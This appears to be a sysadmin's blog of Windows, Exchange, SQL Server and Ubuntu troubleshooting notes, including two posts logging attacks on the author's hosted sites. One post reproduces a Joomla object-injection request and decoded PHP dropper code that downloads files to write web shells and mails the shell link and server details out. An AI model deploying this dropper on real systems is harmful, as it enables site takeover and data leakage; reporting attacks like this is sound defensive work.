You are here: Blog

SQL Server 2014 High CPU After Installing SP2

SQL Server 2014 High CPU After Installing SP2. There are 3 steps I used to fix this:

STEP 1: find the username of the SQL

  • -open "SQL Server 2014 Configuration Manager."
  • -right-click on the instance of SQL that you are running.
  • -click PROPERTIES (a box opens).
  • -click LOG-ON tab (at the top).
  • -take note of the USERNAME that is running.
  • -click OK
  • -exit out of "SQL Server 2014 Configuration Manager."

STEP 2: add the username to the LOCK PAGES IN MEMORY section

  • -click START > RUN
  • -type: gpedit.msc
  • -click ADD-USER-OR-GROUP
  • -type in the USERNAME from above.

STEP 3: adjust the MAX MEMORY

  • -open the 2014 MANAGEMENT STUDIO
  • -login to the SQL DATABASE you are running.
  • -right-click the SQL DATABASE name (at the top, on the left-hand side)
  • -click PROPERTIES
  • -click MEMORY (on the left hand side).
  • -you will see the MINIMUM SERVER MEMORY and the MAXIMUM SERVER MEMORY areas.
  • -leave the MINIMUM SERVER MEMORY at 0 (zero).
  • -find the MAXIMUM SERVER MEMORY box.
  • -type in the number for your server. This number is based on the amount of RAM in your system.
  • -the chart is here: https://www.brentozar.com/blitz/max-memory/
  • -click OK.

That's it!!! You did it!!!

Last Updated on Wednesday, 17 August 2016 11:28

Windows 10 Product Key

slmgr /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx

Of course, replace your product key here.

This didn't work for me for some reason. I had to go traditional gui route and that worked. Same product key.

Last Updated on Friday, 22 July 2016 10:47

WOL Control

Waking remote computers with WOL. As usual, the options are dizzying. Here's a cheat sheet.

See what's capable:

powercfg -devicequery wake_from_any

But this list is too long. Since not all devices can be config'd, some devices are going to wake whether the user wants them to or not. So to see what's capable of being user config'd (what can be changed):

powercfg -devicequery wake_programmable

See what's enabled:

powercfg -devicequery wake_armed

And finally, to enable a device to be a waking point:

POWERCFG -deviceenablewake "exact device name here"

A quick batch script would be:

POWERCFG -devicequery wake_from_any | FINDSTR /i "net" > c:\foo\adapters.txt
FOR /F "tokens=*" %%i IN (c:\foo\adapters.txt) DO POWERCFG -deviceenablewake "%%i" 
Last Updated on Wednesday, 20 July 2016 08:25

Manage Printers via Command Line

Manage printers via command line:

  • Get the default printer details from command line:

    cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -g

  • Get the list of printers added to the system from Windows command line:

    cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -l

  • Set default printer from windows command line:

    cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -t -p "\Servername\printername"

Install Windows 10 In-Place Upgrade on All Computers in a Domain With PDQ Deploy

Install Windows 10 In-place upgrade on a domain is possible in a couple of ways.

The official way is to use the MICROSOFT DEPOLYMENT TOOLKIT found here: https://technet.microsoft.com/en-us/windows/dn475741.aspx

The other way is through simple network share.

Wait... what? Yes, network share.

STEP 1: get WINDOWS 10 ISO at https://www.microsoft.com/en-us/software-download/windows10ISO

  • -you will see 4 options
    WINDOWS 10 (all languages)
    WINDOWS 10 K (Korean law)
    WINDOWS 10 N (European law)
    WINDOWS 10 SINGLE LANGUAGE (1 language only)
  • -simply download the one you need. The one that matches what you have now which is probably WINDOWS 10 ALL LANGUAGES.
  • -again, since you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine.
  • NOTE: do NOT use the MEDIA-CREATION-TOOL for this exercise.

STEP 2: mount WINDOWS 10 ISO

This means show the files that are in the ISO. Windows 7 cannot do this without some help such as WINRAR, 7ZIP or VIRTUAL-CLONEDRIVE. WINDOWS SERVER 2012, WINDOWS 8.1 and newer can do this without additional software. This can happen either through the GUI or through POWERSHELL command MOUNT-DISKIMAGE.

There is no correct way on how you mount the ISO, just do it.

STEP 3: create the network share

Create the share:

  • md C:\installs\os\win10x64\unpack

And share it so everyone can read it (outside the scope of this article post).

STEP 4: copy the ISO contents onto a created network share.

I use ROBOCOPY to do this. It is built into WINDOWS 7 and newer. Something like:

  • robocopy /e f:\ C:\installs\os\win10x64\unpack

STEP 5: Build your install package

Pretty easy when you know what to do it right.

  • -select the setup.exe on the network share. Something like: \\myserver\installs\os\win10x64\unpack\setup.exe
  • -type in the parameters: /auto upgrade /Compat IgnoreWarning /installfrom c:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\sources\install.wim /dynamicupdate disable /showoobe none /quiet
    NOTE: if you would like, you can save the log files as well. Add the following to the end of the parameters above: /copylogs \\myserver\installs\os\win10x64\logs
  • -checkmark "Include Entire Directory"
  • make sure the COPY MODE is changed to PULL (not PUSH).
  • checkmark "use custom timeout" and change the number to 240.
  • save the package.

STEP 6: deploy on test victim.

That should do it!!! If the test pc works, deploy to the rest of the pc's how you see fit.


If for some reason the above PDQ package fails, you can create a .bat file and fill it with following (adjust as necessary):

md c:\installs\Windows10x64

robocopy /MIR \\myserver\installs\os\win10x64\unpack\ c:\installs\Windows10x64

cd c:\installs\Windows10x64

start /wait setup.exe /auto upgrade /Compat IgnoreWarning /installfrom c:\installs\Windows10x64\sources\install.wim /dynamicupdate disable /showoobe none /quiet

  • Save this .bat in \\myserver\installs\os\win10x64\unpack\
  • Then create a PDQ package with this bat.
  • Deploy as you see fit.
Last Updated on Sunday, 17 July 2016 21:59

Automatically Install Office 2016 to Domain Network

Boom: http://www.adminarsenal.com/admin-arsenal-blog/silently-install-office-2016/

  • -download ISO.
  • -mount ISO.
  • -copy contents to network share.
  • -run setup.exe /admin
  • -config (product key, org name, etc).
  • -click FILE SAVE.
  • -save the MSP file at the network share.
  • -follow the rest.

This will automatically deploy OFFICE 2016 to domain PC's of your choosing. And it's completely silent.

This process is how network administration should be done! Not "proof of concept" stuff along with long winded instruction sets.

Last Updated on Friday, 15 July 2016 17:33

HDMI Cable Speeds

2160/60p, 4:2:0, 8-bit, 8.91Gbps
2160/60p, 4:2:0, 10-bit, 11.14Gbps
2160/60p, 4:2:0, 12-bit, 13.37Gbps
2160/60p, 4:2:0, 16-bit, 17.82Gbps
2160/60p, 4:2:2, 8-, 10- or 12-bit, 17.82Gbps
2160/60p, 4:4:4, 8-bit, 17.82Gbps
4320/60p, 4:4:4, 12-bit, ~72Gbps


Standard (or "category 1"), no Ethernet;
High Speed (or "category 2"), no Ethernet;
Standard, with Ethernet;
High Speed, with Ethernet;
Premium, no Ethernet;
Premium, with Ethernet.

Full Disclosure: I have an AudioQuest cable. Picked it up at a conference as a freebie ;-)

Last Updated on Sunday, 10 July 2016 18:00

ErrorCode: 1603(0x643) | Office 2010 Won't Install on Windows 10 | CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057

WINDOWS 10 is having trouble installing software. This is a complex issue but basically some software won't install (or updates won't install) because of an ERROR 1603. More specifically: ErrorCode: 1603(0x643).

Turning on VERBOSE logging (check another article but it puts the logs in %user%\appdata\local\temp) for the install, it shows that the actual error is: CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057. Hmmm... What to do?

  • -click START > RUN > REGEDIT
  • -navigate to: hkey_local_machine/software/microsoft/windows nt/currentversion/profilelist

Nested underneath, you will see SID's. Somthing like:

  • s-1-5-18
  • s-1-5-19
  • s-1-5-20
  • s-1-5-21-...1000
  • s-1-5-21-...1003
  • s-1-5-82

To see what SID's corrospond to actual accounts.

  • -type: wmic useraccount get name,sid

You'll see something like:

  • 1000 owner
  • 1003 tempfix

Notice that s-1-5-18, s-1-5-19, s-1-5-20 do not show. So what's up? Well, this is because these are system-accounts that are not be used/seen. This is what we are concerned about. They are as follows:

  • s-1-5-18 is SYSTEM
  • s-1-5-19 is LOCAL SERVICE
  • s-1-5-20 is NETWORK SERVICE

Next, go back to regedit to: hkey_users

A DEFAULT NORMAL INSTALL has something like:

  • S-1-5-18
  • s-1-5-19
  • s-1-5-20
  • s-1-5-21-...1215
  • s-1-5-21-...1216
  • s-1-5-21-...1217

What we are seeing is that some of the upgrades to WINDOWS 10 are BROKEN and has the following:

  • s-1-5-18
  • s-1-5-19
  • s-1-5-21-...1000
  • s-1-5-21-...1003

So, it is missing s-1-5-20. Here's how to fix:

  • -start > all-programs> accessories
  • -right click COMMAND-PROMPT > run-as-administrator
  • -type ren C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT *.OLD
  • -xcopy /h "C:\Users\Default\NTUSER.DAT" "C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT"
  • -in explorer travel to C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
  • -right-click > properties > security > edit > add
  • -give NETWORK SERVICE full-control
  • -reboot

Now, upon reboot, open REGEDIT again and go to HKEY_USERS. You should now see that s-1-5-20 is added back in. Let's add the correct permissions:

  • -right-click on S-1-5-20
  • -click permissions > add
  • -type: network service
  • -click OK
  • -checkmark FULL CONTROL
  • -click OK

I do not have a good explanation of why this happens. It could be a corrupt file. It could be a failed upgrade. It could be some type of antivirus. I do not know. What I know is that this took a few days to figure out and the software will now install successfully!!!!


Last Updated on Thursday, 07 July 2016 17:17

Download Office 2010

Download Office 2010.

Let's say that you have an OFFICE 2010 install that doesn't work. You cannot uninstall it either. Nor do you have a CD/USB/SOURCE to install because it was on your computer when you bought it and you just used a PRODUCT KEY.

What do you do?

NOTE: !!!Make sure you have your PRODUCT KEY!!! You can get this with BELARC-ADVISOR (among many others).


You can uninstall office by using the automatic uninstall tool here:

2013 | 2016



Yes, you need a PRODUCT KEY/INSTALL KEY. So if you were looking to download for free, this isn't that kind of place.

You can download office here:



  • -run COMMAND PROMPT (as administrator)
  • -office_hs_2010_english_x32.exe /extract:c:\office2010


  • -right-click on setup.exe
  • -run as administrator



Last Updated on Wednesday, 06 July 2016 13:43

[Solved] Your PC Ran Into A Problem And Needs To Restart Windows 10 Loop


"Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop!


"Your PC did not start correctly"

Collectively, let's all say "Arrrrrrrrrrrrrrrrgh!!!"

This is the stuff that I really dread for the average person. How in the world is a normal person supposed to be able to get through an issue like this?

There are 10 possible reasons for this loop and possibly more that need repairing:

  • 1-startup repair
  • 2-checkdisk
  • 3-system restore
  • 4-safe boot / low res
  • 5-sfc
  • 6-windowsapps folder
  • 7-registry repair
  • 8-boot repair
  • 9-dism
  • 10-reload and transfer

ISSUE 1 - There is a startup problem (startup repair).

  • -click TROUBLESHOOT.
  • -click STARTUP REPAIR.
  • -let it go through its process and restart.

ISSUE 2 - There is a filesystem problem (checkdisk).

  • -click TROUBLESHOOT.
  • -type: chkdsk d: /f /r
  • (note depending on what your OS drive letter is, this could be: chkdsk c: /f /r)
  • -let it go through its process and restart.

ISSUE 3 - System Restore

  • -click TROUBLESHOOT.
  • -click SYSTEM RESTORE.
  • this will go through a process of showing previous time in the past. You can choose one of these points. Your system-files will go back to that time, removing any updates, patches or changes. Your document-files will remain as they are now.
  • -let it go through its process and restart.

ISSUE 4 - safe-mode or low-resolution-video

  • -click TROUBLESHOOT.
  • -the computer will reboot and give the options to press F1 through F9
  • -press F3 to try low-resolution video as sometimes Windows 10 suddenly doesn't like the video drivers.
  • -or press F5 to try to get to safe-mode-with-networking.

ISSUE 5 - sfc

  • -click TROUBLESHOOT.
  • -type: sfc /scannow
  • -let it go through its process and restart.

ISSUE 6 - windowsapps folder

For some reason the "windowsapps" folder gets messed up during an update or during system-restore (message about "appxstaging"):

  • -click TROUBLESHOOT.
  • -type: takeown /f "C:\Program Files\WindowsApps" /r /d Y
  • -type: icacls "C:\Program Files\WindowsApps" /grant administrator:F /t
  • -type: rd /s "C:\Program Files\WindowsApps"
  • -reboot and see if that works.

ISSUE 7 - There is a registry error.

  • -click TROUBLESHOOT.
  • -type: d:
  • -hit enter
  • -type: cd windows
  • -hit enter
  • -type: cd system32
  • -hit enter
  • -type: cd config
  • -hit enter
  • -type: ren default default1
  • -hit enter
  • -type: ren sam sam1
  • -hit enter
  • -type: ren software software1
  • -hit enter
  • -type: ren security security1
  • -hit enter
  • -type: ren system system1
  • -hit enter
  • -type: cd regback
  • -hit enter
  • -type: copy * ..\
  • (that is: copy-space-asterisk-space-dot-dot-backslash)
  • -hit enter
  • -type: exit
  • -let it reboot and see if that works.

ISSUE 8 - There is a boot problem.

  • -click TROUBLESHOOT.
  • -type:bootrec.exe /fixmbr
  • -type: bootrec.exe /fixboot
  • -type: bootrec.exe /RebuildBcd
  • -type: exit
  • -let it reboot and see if that works.

ISSUE 9 - dism

This is the only issue that I have not tried personally as I've never had to get this far. The idea is that there is something wrong with Windows and that it can be repaired:

  • -click TROUBLESHOOT.
  • -type: dism /online /cleanup-image /scanhealth
  • -type: dism /online /cleanup-image /restorehealth
  • -let it go through its process and restart.

ISSUE 10 - reload and transfer

If I've gone through the 9 issues above without success, I throw in the towel and reload Windows 10 on a new hard drive (ssd) and transfer the data. Not ideal but usually by this point, reloading and transferring data is going to be faster than further troubleshooting.

Those are the 10 issues that I go through when I get, "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop.

Last Updated on Tuesday, 16 May 2017 15:06

1-3-2 Bios Beeps Dell Precision T3500

Dell Precision T3500 boots fine.

Upon, reboot the system bios beeps: 1-3-2. In other words, beep (pause) beep-beep-beep (pause) beep-beep. Nothing. No bios. Just black screen.

The only way to get it to reboot properly without the bios beeps is to yank the power from the computer. Wait till the electricity discharges from the motherboard by holding in the power button. Plug the system back into the power. Press the power button.

But here's how to fix:

  • -upgrade the bios.
  • -reset to defaults.
  • -turn off the FAST BOOT.
  • -disable the DISKETTE DRIVE.
  • -uncheck the ONBOARD OR USB CD DRIVE.

While we are at it, change the silly default options:

  • -disable LOW-POWER-MODE.
  • -enable HYPER-THREADING (if you have it).
  • -enable MULTICORE.
  • -enable TURBOBOOST.
  • -disable SPEEDSTEP.
  • -enable SMART TEST.

There could be other reasons. For me, this was what worked. The key seemed to be something in the FASTBOOT and the DISKETTE DRIVE.


  • -this was a 6 month process :-(
  • -replacing the 525W power supply with a 850W power supply didn't work.
Last Updated on Wednesday, 29 June 2016 17:32

WINDOWS 10 Falls Asleep After 2 Minutes


01 -click START > RUN > CMD (or POWERSHELL) (as administrator)
02 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\7bc4a2f9-d8fc-4469-b07b-33eb785aaca0" /v Attributes /d 2
03 -enter
04 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\2a737441-1930-4402-8d77-b2bebba308a3\d4e98f31-5ffe-4ce1-be31-1b38b384c009" /v Attributes /d 2
05 -enter
06 -click START > CONTROL-PANEL > POWER-OPTIONS > CHANGE-THE-PLAN-SETTINGS > click on the "Change advanced power settings".
07 -click on the "Change settings that are currently unavailable"
08 -click Sleep > System unattended sleep timeout > type 0
10 -click OK
11 That's it!!! You did it!!!

Last Updated on Monday, 18 September 2017 10:22


I'm not an expert on ACTIVATION as LICENSING is a pain. Luckily, I'm in a corporate situation where budgets are secondary to getting it working. KMS & MAK are not covered here. Here's how:

  • -click START > RUN
  • -type: cmd
  • -type: cd C:\Program Files\Microsoft Office\Office15

From here, there are 3 basic commands to help and resolve: STATUS, CHANGE, ACTIVATE.


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

The result will look something like this:


Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

LICENSE NAME: Office 15, OfficeStandardVL_MAK edition
Last 5 characters of installed product key: XXXXX

Sometimes, there is a double install where 2 different versions are installed at the same time. A KMS version and a MAK version. You can find out by


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /unpkey:last-5-digits


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX


  • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act
Last Updated on Wednesday, 22 June 2016 17:01

Windows 10 ISO

To be clear, you can do a CLEAN INSTALL of WINDOWS 10 if you have WINDOWS 7 or WINDOWS 8 or WINDOWS 8.1 until the end of JULY 2016.

To do so, you need a WINDOWS 10 USB. This is easily obtained by using the WINDOWS 10 MEDIA CREATION TOOL (MCT) here:

Now you have a bootable USB disk.

But what if you want to create a multiple boot USB disk where WINDOWS 10 is just one of the options? You would somehow have to create a WINDOWS 10 ISO.

I enjoy the E2B project. Despite being wordy and looking complicated, it's actually fairly simple. Here's the shortcut.

  • -download the E2B project here: (http://www.easy2boot.com)
  • -unzip the download.
  • -click MAKE_E2B_USB_DRIVE (run as admin)
    (CAUTION!!! This will delete everything on the USB drive.)
  • -install your ISO/IMG/IMGPTN in the appropriate place.

Now to the part where we need a WINDOWS ISO. To be fair, you can get a WINDOWS 10 ISO in 2 ways.


  • Download the ISO from the link using GOOGLE-CHROME'S ANDROID VIEW:
  • -open CHROME
  • -click SETTINGS (at the upper right) > MORE-TOOLS > DEVELOPER-TOOLS
  • -a window open on the right hand side.
  • -click the TOGGLE-DEVICE-TOOLBAR icon (at the top of the right hand side).
  • (It is the second one from the left.)
  • -then visit the following page: https://www.microsoft.com/en-us/software-download/windows10ISO
  • -you will see 4 options
    WINDOWS 10 (all languages)
    WINDOWS 10 K (Korean law)
    WINDOWS 10 N (European law)
    WINDOWS 10 SINGLE LANGUAGE (1 language only)
  • -simply download the one you want (probably WINDOWS 10 ALL LANGUAGES)

For me, doing this somehow downloaded the iso as a WINDOWS 10 HOME version. It doesn't matter, it will still install WINDOWS 10 PRO. But I would like the INSTALL.EDB to say WINDOWS 10 PRO. I do not know yet if it matters.

NOTE: If you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine.


So you have a bootable USB to install WINDOWS 10. You want to turn that into an ISO. How do you do it?

You don't turn it into an ISO. You turn it into a IMG (more specifically an imgPTN file). I won't go into details but you can't turn an entire bootable USB into an ISO easily. There's too many variables. But you can turn a bootable USB partition into a bootable partition image, hence imgPTN.

Here's how to turn it into an BOOTABLE IMG.

  • -download the software to create a PARTITION IMAGE here:
  • http://files.easy2boot.com/200001685-7c24a7e1e7/MPI_Tool_Pack_Plus_CloverLite_065.zip
  • -unzip it.
  • -open the ImDisk\imdiskinst.exe file and run it to install the driver.
  • -plug in your BOOTABLE USB drive.
  • -the computer will assign a drive letter (for example DRIVE G).
  • -drag the USB DRIVE LETTER onto the MAKEPARTIMAGE shortcut.
  • -it will create an image of the USB drive.
  • -wait.
  • -put the IMG in the appropriate folder (probably G:\_ISO\WINDOWS\WIN10\).

That's it!!!! You've done it.

Last Updated on Sunday, 17 July 2016 21:15

Creating Resource Rooms in Exchange 2013

Creating resource rooms in EXCHANGE 2013 can be complicated as the GUI doesn't work in a straight-forward manner.

Here's how I did it:

  • New-Mailbox -Database "Mailbox-FOO" -Name conference.downstairs -DisplayName "Conference Downstairs" -Room
  • Set-MailboxFolderPermission conference.downstairs:\Calendar -User Default -AccessRights Reviewer
  • Set-CalendarProcessing conference.downstairs -AutomateProcessing AutoAccept

This will allow users to set an appointment with the ROOM as the LOCATION but will only allow the ORGANIZER to adjust the appointment (rather than letting anyone change the appointment).

Hacking Attempt 16-06

Here's another hacking attempt on another hosted web site. This attempt is from: which was resolving to catchmeapp.com

NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker.

GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp

This translates into:

$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ;

Which further is decoded to:


function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('');
$open = fopen($check, 'w');
fwrite($open, $text);
    echo $check."</br>";
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
    echo $check2."</br>";
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('');
$op4=fopen($check4, 'w');

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('');
$op5=fopen($check5, 'w');

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;
$text6 = http_get('');
$op6=fopen($check6, 'w');

$toz = " This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it ";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >'; document.write( '' ); document.write( addy_text29858 ); document.write( '<\/a>' ); //--> This e-mail address is being protected from spambots. You need JavaScript enabled to view it ;' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);



Nice try... but not this time.

Last Updated on Sunday, 05 June 2016 17:13

Hacking Attempt 16-05

Here's a recent hacking attempt into a hosted web site. The hacking attempt is from webmeup-crawler.com


This translates into:

<script type='text/javascript'> <!-- var prefix = 'ma'   'il'   'to'; var path = 'hr'   'ef'   '='; var addy64466 = 'PetersHyland'   '@'; addy64466 = addy64466   'ipre'   '.'   'com'; document.write('<a '   path   '\''   prefix   ':'   addy64466   '\'>'); document.write(addy64466); document.write('<\/a>'); /-->\n </script><script type='text/javascript'> <!-- document.write('<span style=\'display: none;\'>'); /--> </script>This email address is being protected from spambots. You need JavaScript enabled to view it. <script type='text/javascript'> <!-- document.write('</'); document.write('span>'); /--> </script>

This was repeated in a brute force attack, changing the password for every attemtp.

Nice one... but not this time.

Clean Install Windows 10

Clean installing Windows 10 can be a pain. There's too many gotchas that it can be frustrating.

Here's how I did it:

  • -download the MEDIA CREATION TOOL for WINDOWS 10.
  • -after your have created the USB, check to make sure you have the right BUILD NUMBER (see other article post).
  • -SKIP PRODUCT KEY DURING INSTALL (OR "Do This Later or I Don't Have a Key"). Save the activation after install with your Windows 7, 8 or 8.1 Product Key, even if embedded in BIOS.
    (NOTE: this is in contrast to the WINDOWS 8 that requires to NOT select "I don't have a product key" as activation will not be successful. )
Last Updated on Sunday, 17 July 2016 22:00

Find Windows 10 ISO Version or Build Number

Finding the Windows 10 ISO version or Build Number is important because builds starting in November 2015 and newer allow you to clean install Windows 10 if you have Windows 7 or Windows 8.

  • -mount the ISO to expose the files. This can be done through Windows 10, if you have another computer available or through VirtualCD.
  • -find where the "install.wim" (or install.esd) is. For example; F:\sources\install.wim
  • -open CMD
  • -type: dism /Get-WimInfo /WimFile:F:\sources\install.wim /index:1
  • -or if Windows 10 install.esd file, type: dism /Get-WimInfo /WimFile:F:\sources\install.esd /index:1

This will show the details of the INSTALL.WIM file.


-in some cases, Windows-7 will not be able to read a Windows-10 install.esd file :-(

Last Updated on Friday, 03 June 2016 08:44

Re-enable Mailbox in Exchange 2013

If you disable a MAILBOX in EXCHANGE, the account is available for 30 days by default. However if you disable a MAILBOX in EXCHANGE and you disable an AD account, the MAILBOX will not show as a disconnected MAILBOX.

Here's how to get it back on demand.

First, check to see the RETENTION settings of the MAILBOXDATABASE:

$Get-MailboxDatabase "Mailbox-Database-Name-Here" | fl | grep MailboxRetention

Now, let's make sure that the MAILBOX is still in the MAILBOXDATABASE:

$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here"

You will see all the accounts. Once you see the account that you want back, you will need the full DISPLAY NAME of the account needed.

$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" | fl | grep -i any-part-of-account-name-here

Lastly, let's reconnect the MAILBOX and connect it to an ACCOUNT:

$Get-MailboxDatabase -Identity "Mailbox-Database-Name-Here"  | Get-MailboxStatistics | Where { $_.Displayname -eq "full-display-name-here)" } | Connect-Mailbox -User "username-here"

Windows 8/8.1/10 Product Keys


You have a new computer and you test out Linux destroying everything on the hard drive. You go to reinstall Windows and you realize that you do not have the PRODUCT KEY. There is no label on the side/back/inside of the pc. You have an OEM Windows 8.1 disk. The pc does not have a DVD drive.


Find a pc that has a DVD drive.

1-create an ISO with 7ZIP.

  • -select the DVD DRIVE.
  • -click VIEW (at the top).
  • -click OPEN ROOT FOLDER.
  • -click VIEW (at the top).
  • -click UP ONE LEVEL.
  • -in the main window you will see: \\. (backslash, backslash, dot).
  • -double-click \\.
  • -select the DVD drive.
  • -click FILE > COPY-TO (at the top)
  • -select the folder where you want the ISO to go.

2-copy that ISO to your EASY2BOOT USB.

  • -easy squeezy.

NOTE: if you do not have one, get one. It's super easy. Run tool. Have USB.

3-install WINDOWS.

  • -the install should use the PRODUCT KEY from the UEFI (or in laymans terms BIOS).
  • -if you are being prompted for a product key, it means that you have the wrong installation media and that's when the Windows 8.1/10 installer can't detect Windows 8/8.1 product key from UEFI firmware (BIOS).
  • -it will prompt which version to install, WINDOWS 8.1, WINDOWS 8.1 CORE, WINDOWS 8.1 SINGLE LANGUAGE (same as PRO), WINDOWS 8.1 PRO
  • -do NOT select "I don't have a product key". Activation will not be successful.


  • -use a wonderful tool called RWEVERYTHING here: http://rweverything.com/download/
  • -open the tool.
  • -click ACPI (at the top).
  • -click MSDM tab (towards the top)
  • -look at the last line, it is the embedded PRODUCT KEY ;-)

There are other ways to do this such as:

  • -type: WMIC Path SoftwareLicensingService Get OA3xOriginalProductKey

As well as other ways.


Last Updated on Friday, 29 April 2016 16:31

Wrong Time on Ubuntu - NTP


Fresh install of Ubuntu. Wrong time. Day later, still wrong time.


  • -edit /etc/ntp.conf
  • -comment out the "pool" servers.
  • -comment out the fallback "pool" server.
  • -add a new line.
  • -type: server (or local server/router/switch that can provide NTP services)
  • -save
  • -stop service: /etc/init.d/ntp stop
  • -start service: /etc/init.d/ntp start
  • -your finished!

This may happen for various reasons. For me, the high-end firewall was blocking outside NTP servers from talking on port 123.

NOTES: do not use/install ntpdate package, it is depreciated.

Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS

Getting Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS can be not-so-straight-forward especially if you are not from the Linux world.



  • open TERMINAL
  • type: cd ~/Downloads
  • type: sudo dkpg -i digitalwatchdog-client-
  • (NOTE: do not just double-click on the file. Do not install with UBUNTU SOFTWARE MANAGER).
  • go through the setup process.

On UBUNTU 14.02, you are finished. On UBUNTU 16.0.4, you need the following:

  • type: sudo apt-get install libgstreamer-plugins-base0.10-dev

That's it! You should now be able to use the Digital Watchdog Spectrum client.

Last Updated on Monday, 25 April 2016 11:41

Dell Windows 7 Product ID



plus this:


 = Umm... WOW!

Last Updated on Thursday, 24 March 2016 15:55

Transfer Hard Drive to New Hardware

Transfer hard drive to new hardware. It can be done.

  • -take note of current setup bios for the ATA, AHCI, RAID setup.
  • -run c:\windows\system32\sysprep\sysprep.exe
  • -click GENERALIZE
  • -wait an hour and let it shutdown.
  • -tranfer to new hardware.
  • -boot pc
  • -change bios to match old setup.
  • -wait for it to boot

All of your stuff should be intact.


If for some reason that doesn't work, you can always load the drivers in the Windows in an offline manner.

  • -find your motherboard model number.
  • -download the CHIPSET DRIVERS.
  • -extract them to the C drive (for example: c:\drivers\chipset)
  • -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc).
  • -click REPAIR YOUR COMPUTER (bottom-left).
  • -click COMMAND PROMPT.
  • -find what letter your WINDOWS-DIRECTORY is.
  • -type: dism /image:c:\ /add-driver /Driver:e:\install\chipset\ /recurse
  • -hit ENTER
  • -type EXIT
  • -reboot

DNS Servers

I love DNS servers. I really do. You ask a question, they give an answer. Here are some of the more popular ones.










You can use OPENDNS as a web content filtering tool to automatically block inappropriate content and keep children safe.




To ask a question you can use DIG (*nix) or NSLOOKUP (Windows). I prefer DIG and install it on Windows rather easily via GNUWIN.

  • -open shell of some kind (putty, command, power, etc)
  • -type: dig daknetworks.com
  • -type: nslookup daknetworks.com

To ask a question of a specific server:

  • -type: dig daknetworks.com @
  • -type: nslookup daknetworks.com

To ask a specific type of record:

  • -type: dig -t mx daknetworks.com
  • -type: nslookup set type=mx daknetworks.com

To ask for an authoritative record:

  • -type: dig -t ns daknetworks.com
  • -type: nslookup -type=soa daknetworks.com

To ask for all the info:

  • -type: nslookup -debug daknetworks.com
Last Updated on Tuesday, 05 September 2017 18:27

Clone MacBook Pro Hard Drive With Boot Camp

I have a 128GB SSD HD and I want to upgrade to a newly acquired 512GB SSD HD. How do I upgrade my ssd hard drive to a larger ssd hard drive on my MacBook Pro?

ps- I have Boot Camp with a Windows partition.
pss- many posts claim this can't be done or post a really, really long and complicated instruction set. Don't believe them. ;-)



  • -clone the drive (clonezilla).
